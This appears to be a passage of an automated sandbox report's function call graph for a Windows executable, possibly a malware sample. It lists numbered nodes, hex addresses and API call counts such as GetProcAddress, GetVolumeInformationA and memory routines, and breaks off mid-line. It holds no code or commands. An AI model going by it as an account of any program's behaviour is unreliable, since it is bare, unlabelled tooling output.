4039ea 70727->70728 70729 40104e 101 API calls 70728->70729 70730 403a02 70729->70730 70731 40104e 101 API calls 70730->70731 70732 403a1a 70731->70732 70733 40104e 101 API calls 70732->70733 70734 403a32 70733->70734 70735 40104e 101 API calls 70734->70735 70736 403a4a 70735->70736 70737 40104e 101 API calls 70736->70737 70738 403a62 70737->70738 70739 40104e 101 API calls 70738->70739 70740 403a7a 70739->70740 70741 40104e 101 API calls 70740->70741 70742 403a92 70741->70742 70743 40104e 101 API calls 70742->70743 70744 403aaa 70743->70744 70745 40104e 101 API calls 70744->70745 70746 403ac2 70745->70746 70747 40104e 101 API calls 70746->70747 70748 403ada 70747->70748 70749 40104e 101 API calls 70748->70749 70750 403af2 70749->70750 70751 40104e 101 API calls 70750->70751 70752 403b0a 70751->70752 70753 40104e 101 API calls 70752->70753 70754 403b22 70753->70754 70755 40104e 101 API calls 70754->70755 70756 403b3a 70755->70756 70757 40104e 101 API calls 70756->70757 70758 403b52 70757->70758 70759 40104e 101 API calls 70758->70759 70760 403b6a 70759->70760 70761 40104e 101 API calls 70760->70761 70762 403b82 70761->70762 70763 40104e 101 API calls 70762->70763 70764 403b9a 70763->70764 70765 40104e 101 API calls 70764->70765 70766 403bb2 70765->70766 70767 40104e 101 API calls 70766->70767 70768 403bca 70767->70768 70769 40104e 101 API calls 70768->70769 70770 403be2 70769->70770 70771 40104e 101 API calls 70770->70771 70772 403bfa 70771->70772 70773 40104e 101 API calls 70772->70773 70774 403c12 70773->70774 70775 40104e 101 API calls 70774->70775 70776 403c2a 70775->70776 70777 40104e 101 API calls 70776->70777 70778 403c42 70777->70778 70779 40104e 101 API calls 70778->70779 70780 403c5a 70779->70780 70781 40104e 101 API calls 70780->70781 70782 403c72 70781->70782 70783 40104e 101 API calls 70782->70783 70784 403c8a 70783->70784 70785 40104e 101 API calls 70784->70785 70786 403ca2 70785->70786 70787 40104e 101 API calls 70786->70787 70788 403cba 70787->70788 70789 40104e 101 API calls 70788->70789 70790 403cd2 70789->70790 70791 40104e 101 API calls 70790->70791 70792 403cea 70791->70792 70793 40104e 101 API calls 70792->70793 70794 403d02 70793->70794 70795 40104e 101 API calls 70794->70795 70796 403d1a 70795->70796 70797 40104e 101 API calls 70796->70797 70798 403d31 70797->70798 70799 40104e 101 API calls 70798->70799 70800 403d49 70799->70800 70801 40104e 101 API calls 70800->70801 70802 403d61 70801->70802 70803 40104e 101 API calls 70802->70803 70804 403d79 70803->70804 70805 40104e 101 API calls 70804->70805 70806 403d91 70805->70806 70807 40104e 101 API calls 70806->70807 70808 403da9 70807->70808 70809 40104e 101 API calls 70808->70809 70810 403dc1 70809->70810 70811 40104e 101 API calls 70810->70811 70812 403dd9 70811->70812 70813 40104e 101 API calls 70812->70813 70814 403df1 70813->70814 70815 40104e 101 API calls 70814->70815 70816 403e09 70815->70816 70817 40104e 101 API calls 70816->70817 70818 403e21 70817->70818 70819 40104e 101 API calls 70818->70819 70820 403e39 70819->70820 70821 40104e 101 API calls 70820->70821 70822 403e51 70821->70822 70823 40104e 101 API calls 70822->70823 70824 403e69 70823->70824 70825 40104e 101 API calls 70824->70825 70826 403e81 70825->70826 70827 40104e 101 API calls 70826->70827 70828 403e99 70827->70828 70829 40104e 101 API calls 70828->70829 70830 403eb1 70829->70830 70831 40104e 101 API calls 70830->70831 70832 403ec9 70831->70832 70833 40104e 101 API calls 70832->70833 70834 403ee1 70833->70834 70835 40104e 101 API calls 70834->70835 70836 403ef9 70835->70836 70837 40104e 101 API calls 70836->70837 70838 403f11 70837->70838 70839 40104e 101 API calls 70838->70839 70840 403f29 70839->70840 70841 40104e 101 API calls 70840->70841 70842 403f41 70841->70842 70843 40104e 101 API calls 70842->70843 70844 403f59 70843->70844 70845 40104e 101 API calls 70844->70845 70846 403f71 70845->70846 70847 40104e 101 API calls 70846->70847 70848 403f89 70847->70848 70849 40104e 101 API calls 70848->70849 70850 403fa1 70849->70850 70851 40104e 101 API calls 70850->70851 70852 403fb9 70851->70852 70853 40104e 101 API calls 70852->70853 70854 403fd1 70853->70854 70855 40104e 101 API calls 70854->70855 70856 403fe9 70855->70856 70857 40104e 101 API calls 70856->70857 70858 404001 70857->70858 70859 40104e 101 API calls 70858->70859 70860 404019 70859->70860 70861 40104e 101 API calls 70860->70861 70862 404031 70861->70862 70863 40104e 101 API calls 70862->70863 70864 404049 70863->70864 70865 40104e 101 API calls 70864->70865 70866 404061 70865->70866 70867 40104e 101 API calls 70866->70867 70868 404079 70867->70868 70869 40104e 101 API calls 70868->70869 70870 404091 70869->70870 70871 40104e 101 API calls 70870->70871 70872 4040a9 70871->70872 70873 40104e 101 API calls 70872->70873 70874 4040c0 70873->70874 70875 40104e 101 API calls 70874->70875 70876 4040d8 70875->70876 70877 40104e 101 API calls 70876->70877 70878 4040ef 70877->70878 70879 40104e 101 API calls 70878->70879 70880 404107 70879->70880 70881 40104e 101 API calls 70880->70881 70882 404121 70881->70882 70883 40104e 101 API calls 70882->70883 70884 404138 70883->70884 70885 40104e 101 API calls 70884->70885 70886 40414f 70885->70886 70887 40104e 101 API calls 70886->70887 70888 404166 70887->70888 70889 40104e 101 API calls 70888->70889 70890 40417d 70889->70890 70891 40104e 101 API calls 70890->70891 70892 404195 70891->70892 70893 40104e 101 API calls 70892->70893 70894 4041ad 70893->70894 70895 40104e 101 API calls 70894->70895 70896 4041c5 70895->70896 70897 40104e 101 API calls 70896->70897 70898 4041dc 70897->70898 70899 40104e 101 API calls 70898->70899 70900 4041f4 70899->70900 70901 40104e 101 API calls 70900->70901 70902 40420c 70901->70902 70903 40104e 101 API calls 70902->70903 70904 404224 70903->70904 70905 40104e 101 API calls 70904->70905 70906 40423c 70905->70906 70907 40104e 101 API calls 70906->70907 70908 404256 70907->70908 70909 40104e 101 API calls 70908->70909 70910 40426d 70909->70910 70911 40104e 101 API calls 70910->70911 70912 404284 70911->70912 70913 40104e 101 API calls 70912->70913 70914 40429b 70913->70914 70915 40104e 101 API calls 70914->70915 70916 4042b3 70915->70916 70917 40104e 101 API calls 70916->70917 70918 4042ca 70917->70918 70919 40104e 101 API calls 70918->70919 70920 4042e1 70919->70920 70921 40104e 101 API calls 70920->70921 70922 4042f8 70921->70922 70923 40104e 101 API calls 70922->70923 70924 404310 70923->70924 70925 40104e 101 API calls 70924->70925 70926 404328 70925->70926 70927 40104e 101 API calls 70926->70927 70928 404340 70927->70928 70929 40104e 101 API calls 70928->70929 70930 404358 70929->70930 70931 40104e 101 API calls 70930->70931 70932 404370 70931->70932 70933 40104e 101 API calls 70932->70933 70934 404387 70933->70934 70935 40104e 101 API calls 70934->70935 70936 40439f 70935->70936 70937 40104e 101 API calls 70936->70937 70938 4043b7 70937->70938 70939 40104e 101 API calls 70938->70939 70940 4043cf 70939->70940 70941 40104e 101 API calls 70940->70941 70942 4043e7 70941->70942 70943 40104e 101 API calls 70942->70943 70944 4043ff 70943->70944 70945 40104e 101 API calls 70944->70945 70946 404416 70945->70946 70947 40104e 101 API calls 70946->70947 70948 40442e 70947->70948 70949 40104e 101 API calls 70948->70949 70950 404446 70949->70950 70951 40104e 101 API calls 70950->70951 70952 40445d 70951->70952 70953 40104e 101 API calls 70952->70953 70954 404475 70953->70954 70955 40104e 101 API calls 70954->70955 70956 40448d 70955->70956 70957 40104e 101 API calls 70956->70957 70958 4044a5 70957->70958 70959 40104e 101 API calls 70958->70959 70960 4044bd 70959->70960 70961 40104e 101 API calls 70960->70961 70962 4044d5 70961->70962 70963 40104e 101 API calls 70962->70963 70964 4044ec 70963->70964 70965 40104e 101 API calls 70964->70965 70966 404504 70965->70966 70967 40104e 101 API calls 70966->70967 70968 40451c 70967->70968 70969 40104e 101 API calls 70968->70969 70970 404534 70969->70970 70971 40104e 101 API calls 70970->70971 70972 40454c 70971->70972 70973 40104e 101 API calls 70972->70973 70974 404564 70973->70974 70975 40104e 101 API calls 70974->70975 70976 40457c 70975->70976 70977 40104e 101 API calls 70976->70977 70978 404594 70977->70978 70979 40104e 101 API calls 70978->70979 70980 4045ac 70979->70980 70981 40104e 101 API calls 70980->70981 70982 4045c4 70981->70982 70983 40104e 101 API calls 70982->70983 70984 4045dc 70983->70984 70985 40104e 101 API calls 70984->70985 70986 4045f4 70985->70986 70987 40104e 101 API calls 70986->70987 70988 40460b 70987->70988 70989 40104e 101 API calls 70988->70989 70990 404623 70989->70990 70991 40104e 101 API calls 70990->70991 70992 40463b 70991->70992 70993 40104e 101 API calls 70992->70993 70994 404652 70993->70994 70995 40104e 101 API calls 70994->70995 70996 404669 70995->70996 70997 40104e 101 API calls 70996->70997 70998 404681 70997->70998 70999 40104e 101 API calls 70998->70999 71000 404698 70999->71000 71001 41dbfc 71000->71001 71002 41e167 12 API calls 71001->71002 71003 41dc09 60 API calls 71001->71003 71004 41e2c4 71002->71004 71005 41e23f 6 API calls 71002->71005 71003->71002 71006 41e30d 71004->71006 71007 41e2cd GetProcAddress GetProcAddress GetProcAddress 71004->71007 71005->71004 71008 41e31a 15 API calls 71006->71008 71009 41e46e 71006->71009 71007->71006 71008->71009 71010 41e5a1 71009->71010 71011 41e47b 13 API calls 71009->71011 71012 41e64a 71010->71012 71013 41e5ae 7 API calls 71010->71013 71011->71010 71014 41e6c1 71012->71014 71015 41e653 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71012->71015 71013->71012 71016 41e7c6 71014->71016 71017 41e6ce 11 API calls 71014->71017 71015->71014 71018 41e80f 71016->71018 71019 41e7cf GetProcAddress GetProcAddress GetProcAddress 71016->71019 71017->71016 71020 41e858 71018->71020 71021 41e818 GetProcAddress GetProcAddress GetProcAddress 71018->71021 71019->71018 71022 41e865 6 API calls 71020->71022 71023 41e8ea 71020->71023 71021->71020 71022->71023 71024 41e8f3 GetProcAddress 71023->71024 71025 41e905 71023->71025 71024->71025 71026 41e912 8 API calls 71025->71026 71027 41e9c5 71025->71027 71026->71027 71028 41ea21 71027->71028 71029 41e9ce GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71027->71029 71028->69865 71029->71028 71527 425668 71030->71527 71032 41a313 GetWindowsDirectoryA 71033 41a361 GetVolumeInformationA 71032->71033 71034 41a35a 71032->71034 71035 41a3a2 71033->71035 71034->71033 71036 41a3f9 GetProcessHeap HeapAlloc 71035->71036 71037 41a41e wsprintfA 71036->71037 71038 41a40e 71036->71038 71039 41a444 _strlen 71037->71039 71554 4053f2 71038->71554 71528 409d68 71039->71528 71042 41a454 71043 41a5be 71042->71043 71537 419f13 71042->71537 71044 4256eb Mailbox 5 API calls 71046 40dd2e lstrcat 71044->71046 71046->69869 71047 41a4a4 71048 41a047 80 API calls 71047->71048 71049 41a4b9 71048->71049 71542 40c0ad 71049->71542 71057 41a416 Mailbox 71057->71044 71059 41a075 71058->71059 71060 4053f2 numpunct 79 API calls 71059->71060 71061 41a085 71060->71061 71062 42305a __crtGetLocaleInfoA_stat 5 API calls 71061->71062 71063 40dd6d lstrcat 71062->71063 71527->71032 71529 409d78 numpunct 71528->71529 71530 409d98 71529->71530 71531 409d7c 71529->71531 71532 409db2 71530->71532 71570 42236a 69 API calls 2 library calls 71530->71570 71562 405029 71531->71562 71535 409d96 _memmove 71532->71535 71571 404fc5 71532->71571 71535->71042 71538 419f38 71537->71538 71539 419f1e 71537->71539 71538->71047 71610 419c8c 87 API calls __forcdecpt_l 71539->71610 71541 419f30 71541->71047 71611 4052be 71542->71611 71555 40540e _strlen 71554->71555 71625 40537d 71555->71625 71557 40541a 71557->71057 71563 405045 71562->71563 71564 40503b 71562->71564 71566 405067 71563->71566 71578 42236a 69 API calls 2 library calls 71563->71578 71577 4223b7 69 API calls 2 library calls 71564->71577 71568 404fc5 numpunct 79 API calls 71566->71568 71569 405079 _memmove 71566->71569 71568->71569 71569->71535 71570->71532 71572 404fd1 71571->71572 71573 404fdb 71571->71573 71583 42236a 69 API calls 2 library calls 71572->71583 71576 404feb Mailbox 71573->71576 71579 404ed8 71573->71579 71576->71535 71577->71563 71578->71566 71580 404ee4 __EH_prolog3_catch 71579->71580 71584 404dba 71580->71584 71582 404f2f Mailbox ctype _memmove 71582->71576 71583->71573 71585 404dc7 71584->71585 71586 404dff 71584->71586 71587 404dd5 71585->71587 71592 425141 71585->71592 71586->71582 71587->71586 71604 424b11 68 API calls std::exception::_Copy_str 71587->71604 71590 404dea 71605 4251c1 RaiseException 71590->71605 71596 42514b 71592->71596 71593 4249bb _malloc 68 API calls 71593->71596 71594 425165 71594->71587 71596->71593 71596->71594 71599 425167 std::exception::exception 71596->71599 71606 42a12a DecodePointer 71596->71606 71597 4251a5 71608 424bc8 68 API calls std::exception::operator= 71597->71608 71599->71597 71607 425f8e 78 API calls __cinit 71599->71607 71600 4251af 71609 4251c1 RaiseException 71600->71609 71604->71590 71605->71586 71606->71596 71607->71597 71608->71600 71610->71541 71612 4052d3 71611->71612 71613 4052dd 71611->71613 71622 4223b7 69 API calls 2 library calls 71612->71622 71615 405307 71613->71615 71616 4052ed 71613->71616 71618 404fc5 numpunct 79 API calls 71615->71618 71623 404e1c 69 API calls 2 library calls 71616->71623 71621 405305 _memmove 71618->71621 71619 4052f9 71624 404e1c 69 API calls 2 library calls 71619->71624 71622->71613 71623->71619 71624->71621 71626 40538d numpunct 71625->71626 71627 405391 71626->71627 71628 4053ad 71626->71628 71630 4052be numpunct 79 API calls 71627->71630 71629 404fc5 numpunct 79 API calls 71628->71629 71631 4053ab _memmove 71629->71631 71630->71631 71631->71557 73884 61e597a7 73885 61e597b4 73884->73885 73892 61e15172 73885->73892 73887 61e59863 73891 61e5ae99 73887->73891 73903 61e165ec 73887->73903 73889 61e59804 73889->73887 73902 61e1a7b6 free realloc malloc 73889->73902 73893 61e1522e 73892->73893 73894 61e15187 73892->73894 73893->73889 73894->73893 73895 61e151bd 73894->73895 73896 61e0cb60 24 API calls 73894->73896 73907 61e0cb60 73895->73907 73896->73895 73898 61e151db 73898->73893 73899 61e0cb60 24 API calls 73898->73899 73900 61e15206 73899->73900 73900->73893 73901 61e0cb60 24 API calls 73900->73901 73901->73893 73902->73887 73904 61e165a3 73903->73904 73905 61e165fc 73903->73905 73904->73903 74128 61e1658e 73904->74128 73905->73891 73908 61e0cca6 73907->73908 73909 61e0cb68 73907->73909 73908->73898 73910 61e0cb7b 73909->73910 73911 61e0cb60 24 API calls 73909->73911 73913 61e75f1f 73909->73913 73910->73898 73911->73909 73914 61e75f53 73913->73914 73918 61e75fd0 73913->73918 73915 61e1aaa4 3 API calls 73914->73915 73914->73918 73934 61e75fa8 73914->73934 73915->73934 73917 61e76667 73917->73918 73951 61e1a7b6 free realloc malloc 73917->73951 73918->73909 73919 61e1aaa4 free realloc malloc 73919->73934 73920 61e761a9 73945 61e1a7b6 free realloc malloc 73920->73945 73923 61e76150 73946 61e1a7b6 free realloc malloc 73923->73946 73928 61e1a7b6 free realloc malloc 73928->73934 73929 61e2086f free realloc malloc 73932 61e762e8 73929->73932 73932->73917 73932->73918 73932->73929 73948 61e20759 free realloc malloc 73932->73948 73949 61e1a7b6 free realloc malloc 73932->73949 73950 61e27289 free realloc malloc 73932->73950 73933 61e0cb60 24 API calls 73933->73934 73934->73918 73934->73919 73934->73920 73934->73923 73934->73928 73934->73932 73934->73933 73935 61e593bd free realloc malloc strcmp 73934->73935 73936 61e769f5 73934->73936 73938 61e75edb 73934->73938 73942 61e29a02 73934->73942 73947 61e6b5bb 24 API calls 73934->73947 73935->73934 73952 61e1a7b6 free realloc malloc 73936->73952 73939 61e75ef1 73938->73939 73953 61e75c77 73939->73953 73941 61e75f17 73941->73934 74106 61e1a755 73942->74106 73945->73918 73946->73918 73947->73934 73948->73932 73949->73932 73950->73932 73951->73918 73952->73918 73954 61e75ca7 73953->73954 73962 61e75c90 73953->73962 73975 61e757ae 73954->73975 73956 61e75eb6 73985 61e1a7b6 free realloc malloc 73956->73985 73957 61e75e90 73984 61e1a7b6 free realloc malloc 73957->73984 73960 61e75d3a 73961 61e1aaa4 3 API calls 73960->73961 73966 61e75d99 73960->73966 73974 61e75cb0 73960->73974 73963 61e75d7e 73961->73963 73962->73960 73962->73966 73962->73974 73979 61e23bfe free realloc malloc 73962->73979 73965 61e75dad 73963->73965 73963->73966 73980 61e24945 free realloc malloc 73965->73980 73966->73956 73966->73957 73966->73974 73968 61e75de8 73981 61e24945 free realloc malloc 73968->73981 73970 61e75df3 73982 61e24945 free realloc malloc 73970->73982 73972 61e75e08 73972->73974 73983 61e1a7b6 free realloc malloc 73972->73983 73974->73941 73976 61e757c2 73975->73976 73978 61e757be 73975->73978 73986 61e7571b 73976->73986 73978->73962 73979->73960 73980->73968 73981->73970 73982->73972 73983->73974 73984->73974 73985->73974 73987 61e75751 73986->73987 73989 61e75744 73986->73989 73992 61e753be 73987->73992 73990 61e753be 24 API calls 73989->73990 73991 61e75768 73989->73991 73990->73989 73991->73978 74005 61e885c9 73992->74005 73994 61e7545e 73998 61e754b4 73994->73998 74001 61e754c1 73994->74001 74004 61e75485 73994->74004 74014 61e4c7c5 73994->74014 73997 61e29a02 3 API calls 73999 61e7560c 73997->73999 73998->73997 73998->74001 74029 61e75015 73999->74029 74001->74004 74059 61e1a839 free realloc malloc 74001->74059 74002 61e75647 74002->74001 74058 61e752d9 15 API calls 74002->74058 74004->73989 74006 61e885f2 74005->74006 74007 61e885e9 74005->74007 74006->73994 74007->74006 74008 61e886f3 74007->74008 74010 61e886ec 74007->74010 74011 61e886f5 74007->74011 74062 61e5655a 15 API calls 74008->74062 74060 61e1a839 free realloc malloc 74010->74060 74011->74008 74061 61e2d35e free realloc malloc 74011->74061 74027 61e4c7e7 74014->74027 74015 61e4ccf6 74020 61e4ccf1 74015->74020 74091 61e14bcf free realloc malloc 74015->74091 74019 61e4c907 memcmp 74019->74027 74020->73998 74021 61e4c95d memcmp 74021->74027 74022 61e4cc08 memcmp 74022->74027 74023 61e4c9d9 memcmp 74023->74027 74027->74015 74027->74019 74027->74020 74027->74021 74027->74022 74027->74023 74028 61e15e54 3 API calls 74027->74028 74063 61e4b8a1 74027->74063 74085 61e032bd 74027->74085 74088 61eb24c5 8 API calls 74027->74088 74089 61e0c919 free 74027->74089 74090 61e2a72e free realloc malloc 74027->74090 74028->74027 74092 61e2d258 74029->74092 74032 61e75036 74098 61e2c708 free realloc malloc 74032->74098 74033 61e75045 74035 61e0c05c free 74033->74035 74049 61e75063 74035->74049 74036 61e751a8 74037 61e75266 74036->74037 74104 61e56534 15 API calls 74036->74104 74039 61e11243 free 74037->74039 74040 61e7527c 74039->74040 74042 61e75040 74040->74042 74105 61e2d35e free realloc malloc 74040->74105 74041 61e7485a 14 API calls 74041->74049 74042->74002 74045 61e1a985 3 API calls 74045->74049 74046 61e75290 74046->74042 74048 61e0c05c free 74046->74048 74048->74042 74049->74036 74049->74041 74049->74045 74050 61e751e3 74049->74050 74053 61e751a1 74049->74053 74057 61e885c9 15 API calls 74049->74057 74099 61e1f9e1 free 74049->74099 74100 61e11954 free 74049->74100 74103 61e56534 15 API calls 74049->74103 74102 61e56534 15 API calls 74050->74102 74101 61e1a839 free realloc malloc 74053->74101 74054 61e751eb 74056 61e0c05c free 74054->74056 74056->74036 74057->74049 74058->74001 74059->74004 74060->74008 74061->74008 74062->74006 74074 61e4b8b9 74063->74074 74075 61e4bc0c 74063->74075 74064 61e4bcbe 74064->74027 74065 61e13b24 free 74065->74064 74066 61e4bb3d 74066->74064 74066->74065 74067 61e3720a 12 API calls 74067->74075 74068 61e014e3 7 API calls 74069 61e4bb76 74068->74069 74069->74066 74070 61e4bb91 memcmp 74069->74070 74076 61e4bbaf 74070->74076 74071 61e4b8df 74071->74066 74072 61e4baf0 74071->74072 74077 61e0161e 8 API calls 74071->74077 74084 61e4b9c4 74071->74084 74072->74066 74073 61e4abf5 12 API calls 74072->74073 74072->74084 74073->74084 74074->74066 74074->74071 74078 61e0161e 8 API calls 74074->74078 74082 61e4b976 74074->74082 74074->74084 74075->74066 74075->74067 74076->74075 74079 61eb24c5 8 API calls 74076->74079 74080 61e4bada 74077->74080 74078->74082 74079->74075 74080->74072 74083 61e2a6f9 free realloc malloc 74080->74083 74081 61e014e3 7 API calls 74081->74071 74082->74071 74082->74081 74082->74084 74083->74072 74084->74066 74084->74068 74084->74076 74086 61e02a84 12 API calls 74085->74086 74087 61e032dd 74086->74087 74087->74027 74088->74027 74089->74027 74090->74027 74091->74020 74093 61e2d262 74092->74093 74095 61e2d26c 74092->74095 74094 61e2d29e 74093->74094 74097 61e2a4ce free realloc malloc 74093->74097 74094->74032 74094->74033 74095->74094 74096 61e2d217 free realloc malloc 74095->74096 74096->74093 74097->74094 74098->74042 74099->74049 74100->74049 74101->74036 74102->74054 74103->74049 74104->74037 74105->74046 74113 61e19208 74106->74113 74110 61e1a79e 74111 61e1a7ad 74110->74111 74126 61e1a839 free realloc malloc 74110->74126 74111->73934 74119 61e19220 74113->74119 74114 61e192b1 74121 61e1aa4a 74114->74121 74115 61e19296 74127 61e1d373 free realloc malloc 74115->74127 74117 61e1a99c free realloc malloc 74117->74119 74118 61e1d3a8 free realloc malloc 74118->74119 74119->74114 74119->74115 74119->74117 74119->74118 74120 61e1d54e free realloc malloc 74119->74120 74120->74119 74122 61e1aa6a 74121->74122 74123 61e1a9fb 74121->74123 74122->74110 74123->74122 74124 61e1a985 3 API calls 74123->74124 74125 61e1aa15 74124->74125 74125->74110 74126->74111 74127->74114 74129 61e165a1 74128->74129 74131 61e164fb 74128->74131 74129->73904 74130 61e16546 74130->73904 74131->74130 74132 61e16531 74131->74132 74140 61e164fb free 74131->74140 74134 61e16541 74132->74134 74135 61e16548 74132->74135 74141 61e16404 free 74134->74141 74137 61e165ec free 74135->74137 74138 61e1654d 74137->74138 74138->74130 74142 61e1677f free 74138->74142 74140->74132 74141->74130 74142->74130 74143 61e25136 74144 61e251b1 74143->74144 74146 61e2515a 74143->74146 74145 61e1658e free 74144->74145 74147 61e25250 74145->74147 74148 61e251b3 74146->74148 74149 61e2519b 74146->74149 74151 61e251cb 74148->74151 74152 61e251b9 74148->74152 74168 61e1a7b6 free realloc malloc 74149->74168 74159 61e1b562 74151->74159 74169 61e1a7b6 free realloc malloc 74152->74169 74157 61e25207 74170 61e20919 free realloc malloc 74157->74170 74160 61e1b569 74159->74160 74171 61e1b434 74160->74171 74163 61e1be35 74164 61e1be39 74163->74164 74165 61e1be4d 74163->74165 74183 61e1bc0e 74164->74183 74165->74157 74167 61e1be4b 74167->74157 74168->74144 74169->74144 74170->74144 74172 61e1b447 74171->74172 74173 61e1b458 74171->74173 74175 61e1a8d8 74172->74175 74173->74163 74176 61e1a8b5 74175->74176 74177 61e1a908 74176->74177 74178 61e13da6 3 API calls 74176->74178 74177->74173 74179 61e1a8c5 74178->74179 74180 61e1a8d2 74179->74180 74182 61e1a839 free realloc malloc 74179->74182 74180->74173 74182->74180 74184 61e1bc36 74183->74184 74186 61e1bc25 74183->74186 74185 61e1a8d8 3 API calls 74184->74185 74185->74186 74187 61e1bd6b 74186->74187 74189 61e1bdee 74186->74189 74194 61e1bdbe 74186->74194 74191 61e1bd9c 74187->74191 74193 61e1bc0e 3 API calls 74187->74193 74187->74194 74188 61e1be02 74192 61e1be35 3 API calls 74188->74192 74189->74188 74190 61e1be35 3 API calls 74189->74190 74189->74194 74190->74188 74191->74194 74195 61e1bc0e 3 API calls 74191->74195 74192->74194 74193->74191 74194->74167 74195->74194 74196 61e89bfd 74197 61e89c44 74196->74197 74198 61e89c27 74196->74198 74199 61e89c49 74198->74199 74200 61e89c2e 74198->74200 74202 61e89c53 74199->74202 74212 61e89c7f 74199->74212 74292 61e1a7b6 free realloc malloc 74200->74292 74293 61e25258 free realloc malloc 74202->74293 74204 61e89c70 74205 61e89d9c 74204->74205 74211 61e89d49 74204->74211 74206 61e89da2 74205->74206 74207 61e89db4 74205->74207 74300 61e1a7b6 free realloc malloc 74206->74300 74214 61e88fca 74207->74214 74295 61e253a9 74211->74295 74212->74204 74294 61e25258 free realloc malloc 74212->74294 74215 61e89005 74214->74215 74278 61e891aa 74214->74278 74217 61e757ae 24 API calls 74215->74217 74215->74278 74216 61e1658e free 74218 61e89baa 74216->74218 74219 61e89027 74217->74219 74220 61e165ec free 74218->74220 74221 61e253a9 3 API calls 74219->74221 74219->74278 74223 61e89bbc 74220->74223 74222 61e8903a 74221->74222 74225 61e890d9 74222->74225 74222->74278 74301 61e248d8 74222->74301 74223->74197 74228 61e891af 74225->74228 74239 61e890fb 74225->74239 74225->74278 74226 61e8905e 74226->74278 74310 61e0d049 24 API calls 74226->74310 74230 61e891b9 74228->74230 74232 61e891df 74228->74232 74229 61e890c9 74231 61e75edb 24 API calls 74229->74231 74312 61e1a7b6 free realloc malloc 74230->74312 74231->74225 74233 61e891ff 74232->74233 74237 61e892c1 74232->74237 74313 61e1b666 74233->74313 74240 61e29a02 3 API calls 74237->74240 74238 61e89206 74238->74278 74317 61e29795 free strrchr realloc malloc 74238->74317 74311 61e1a7b6 free realloc malloc 74239->74311 74243 61e892f1 74240->74243 74242 61e8931a 74244 61e893ea 74242->74244 74251 61e89324 74242->74251 74242->74278 74243->74242 74243->74278 74319 61e247a0 free realloc malloc 74243->74319 74254 61e893d2 74244->74254 74323 61e1a7b6 free realloc malloc 74244->74323 74246 61e89229 74246->74243 74250 61e8925b 74246->74250 74246->74278 74247 61e89354 74247->74278 74320 61e247a0 free realloc malloc 74247->74320 74250->74278 74318 61e1a7b6 free realloc malloc 74250->74318 74321 61e1cb7a free realloc malloc 74251->74321 74254->74278 74324 61e1ab7b free realloc malloc 74254->74324 74255 61e893c8 74322 61e1cb1f free realloc malloc 74255->74322 74259 61e89810 74263 61e8995e 74259->74263 74268 61e89904 74259->74268 74291 61e89604 74259->74291 74260 61e895f4 74325 61e1a7b6 free realloc malloc 74260->74325 74261 61e89498 74261->74260 74269 61e8970a 74261->74269 74261->74291 74326 61e278ee free memmove realloc malloc 74261->74326 74263->74291 74329 61e22a48 free realloc malloc 74263->74329 74264 61e8990a 74266 61e14718 3 API calls 74264->74266 74267 61e89919 74266->74267 74267->74291 74328 61e1a839 free realloc malloc 74267->74328 74268->74264 74272 61e89b25 74268->74272 74269->74259 74275 61e89863 74269->74275 74334 61e1a7b6 free realloc malloc 74272->74334 74273 61e89985 74273->74291 74330 61e22399 free realloc malloc 74273->74330 74275->74291 74327 61e1a7b6 free realloc malloc 74275->74327 74277 61e89b38 74335 61e2a72e free realloc malloc 74277->74335 74278->74216 74279 61e899af 74331 61e222b9 free realloc malloc 74279->74331 74283 61e899cd 74284 61e89a2e 74283->74284 74285 61e29a02 3 API calls 74283->74285 74332 61e887af free realloc malloc 74284->74332 74285->74284 74287 61e89a6d 74288 61e29a02 3 API calls 74287->74288 74287->74291 74289 61e89ab2 74288->74289 74333 61e22504 free realloc malloc 74289->74333 74291->74278 74336 61e16889 74291->74336 74292->74197 74293->74204 74294->74212 74296 61e25402 74295->74296 74298 61e253ad 74295->74298 74296->74197 74297 61e253f4 74297->74197 74298->74297 74344 61e1a7b6 free realloc malloc 74298->74344 74300->74197 74302 61e248e9 74301->74302 74307 61e24906 74301->74307 74303 61e248f6 74302->74303 74304 61e24908 74302->74304 74341 61e1a7b6 free realloc malloc 74303->74341 74342 61e1b697 free realloc malloc 74304->74342 74307->74226 74308 61e24914 74308->74307 74343 61e1a7b6 free realloc malloc 74308->74343 74310->74229 74311->74278 74312->74278 74314 61e1b673 74313->74314 74315 61e1b688 74313->74315 74316 61e1b434 3 API calls 74314->74316 74315->74238 74316->74315 74317->74246 74318->74278 74319->74247 74320->74242 74321->74255 74322->74254 74323->74254 74324->74261 74325->74291 74326->74261 74327->74291 74328->74291 74329->74273 74330->74279 74331->74283 74332->74287 74334->74277 74335->74291 74337 61e1658e free 74336->74337 74338 61e168a4 74337->74338 74339 61e165ec free 74338->74339 74340 61e168b3 74339->74340 74340->74278 74341->74307 74342->74308 74343->74307 74344->74297 74345 61e16b04 74348 61e16b14 74345->74348 74346 61e16b4e 74347 61e16bcb 74346->74347 74358 61e16b55 74346->74358 74356 61e16bcf 74347->74356 74364 61e16404 free 74347->74364 74348->74346 74349 61e14718 3 API calls 74348->74349 74350 61e16889 free 74348->74350 74349->74348 74350->74348 74353 61e16c36 74357 61e165ec free 74353->74357 74354 61e14718 3 API calls 74354->74358 74355 61e16aa0 free 74355->74358 74360 61e165fe 74356->74360 74359 61e16c62 74357->74359 74358->74354 74358->74355 74358->74356 74361 61e16609 74360->74361 74362 61e16661 74360->74362 74361->74362 74363 61e165ec free 74361->74363 74362->74353 74363->74362 74364->74356 74365 61e0ae85 74366 61e0ae8f 74365->74366 74367 61e0ae03 free 74366->74367 74368 61e0adeb 74366->74368 74367->74368 74369 61e757e8 74370 61e75803 74369->74370 74371 61e7580c 74370->74371 74372 61e248d8 3 API calls 74370->74372 74395 61e75871 74371->74395 74421 61e29795 free strrchr realloc malloc 74371->74421 74373 61e75847 74372->74373 74374 61e75876 74373->74374 74377 61e75861 74373->74377 74373->74395 74375 61e1b666 3 API calls 74374->74375 74375->74371 74420 61e1a7b6 free realloc malloc 74377->74420 74378 61e758d7 74378->74395 74422 61e247a0 free realloc malloc 74378->74422 74381 61e75932 74382 61e75940 74381->74382 74381->74395 74423 61e247a0 free realloc malloc 74381->74423 74383 61e75949 74382->74383 74385 61e757ae 24 API calls 74382->74385 74382->74395 74386 61e1aaa4 3 API calls 74383->74386 74388 61e75993 74385->74388 74387 61e75a2f 74386->74387 74387->74395 74426 61e22a48 free realloc malloc 74387->74426 74389 61e759ab 74388->74389 74390 61e759f8 74388->74390 74388->74395 74389->74395 74424 61e1a7b6 free realloc malloc 74389->74424 74390->74383 74393 61e75a08 74390->74393 74425 